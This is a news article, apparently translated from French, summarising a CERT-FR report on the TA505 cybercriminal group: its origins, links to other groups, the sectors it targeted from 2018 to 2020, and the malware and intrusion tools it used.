From Dridex Locky to Clop, the TA505 group of cybercriminals has spread a lot of malware as dangerous as it is devastating. The Government Center for Monitoring, Warning and Response to French Computer Attacks (CERT-FR) has published a report to determine the evolution of its activities since 2014.
What do Dridex, TrickBot trojans and Locky and Clop ransomware have in common? TA505. Behind this name, there is a gang of cyber hackers – most likely of Russian origin – which has been illustrated for years in the flourishing of cybercrime operations based on this malware. After having zoomed in on the origins and uses of Dridex last May, the Government Center for Monitoring, Warning and Response to French Computer Attacks (CERT-FR) looked into the development of the activity of group of cyber criminals TA505.
“Often confused with the cybercriminal group Evil Corp (operating the Dridex botnet and the BitPaymer ransomware), and sometimes considered as the operator of the Necurs botnet, TA505 uses an evolving arsenal of attack which it implements during varied campaigns and sometimes simultaneous, which can lead to confusion about his motivations, ”says CERT-FR. “As such, the links he presents with Lazarus and Silence suggest that TA505 would run campaigns on its own and campaigns on behalf of its customers.”
A variety of targets and sectors
If TA505 started to be talked about in 2017, the creation of this group of cybercriminals dates back – at least – to 2014 according to the government center for monitoring and alert. From a target point of view, do not be jealous, since the largest sectors have not been spared from the bursts of cyber attacks from this group. Among which those targeting the automotive industry (January 2018), the financial sector (October, November and December 2018, the hotel industry (December 2018 to March 2019), banks (June-July 2019), government agencies (July -August 2019), Education (December 2019) and health-pharmacy (January-March 2020).
The perfect hacker toolbox
Regarding the operating mode used by TAO505, several first level codes were tested according to the monitoring center, including Quant Loader, Marap, Amadey and Andromut (aka Gelup). “The TA505 operating mode therefore does not seem to hesitate to set aside some of its attack codes to test others. Despite this, a trend emerges: it seems to use the first level malicious code Get2 on a more regular basis, the backdoor component of which is also called Friendspeak, ”specifies CERT-FR. Some of the second-level malware used is FlawedAmmvy, tRat, RMS or RmansSys, ServHelper, FlawedGrace, FlowerPippi and SDBbot. To explore the SI, the group of cybercriminals made lateral moves in the SI – facilitated by the use of Colbalt Strike and TinyMet penetration testing software – by activating several methods: PowerSploit on one side and AdFind to map the SI . For its part, Mimikatz was used for collecting authentication information on compromised machines, and Locky and Clop for malicious encryption.